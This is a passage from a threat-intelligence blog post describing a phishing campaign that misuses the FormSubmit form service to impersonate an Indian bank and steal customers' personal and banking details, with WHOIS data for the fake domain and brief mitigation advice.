Scammers Misuse FormSubmit SaaS Platform to Steal PII of Indian Banking Customers
December 14, 2022
•
4
min read
Category:
Adversary Intelligence
Industry:
Banking and Finance
Motivation:
Financial
Region:
Asia & Pacific
Executive Summary
THREAT
IMPACT
MITIGATION
Scammers use a free form service provider with no code integration to forward victims’ PII information to a verified email.
Using this scammers can steal banking credentials and PII.
Stolen PII details can be used to fuel various social engineering campaigns
Victims can be exploited financially.
Use XVigil to actively track events and take the necessary actions.
Educate customers about such fraudulent activities through various social media posts.
Analysis and Attribution
CloudSEK’s contextual AI digital risk platform XVigil uncovered a phishing campaign abusing a SaaS platform, named FormSubmit, to impersonate a popular Indian bank.
FormSubmit is a no-code form service, designed to send input data from an HTML form straight to a specified email address.
This campaign was uncovered while analyzing a suspect domain which was classified as a threat by XVigil on 10 November 2022.
Information from the Fake Domain
The following information was gathered from the WHOIS records:
Creation Date: 08 November 2022
Updation Date: 08 November 2022
Domain Registrar: GoDaddy
Using FormSubmit to Create a Phishing Page
FormSubmit requires no integration but a designed form for a website and it can be set up within 3 steps: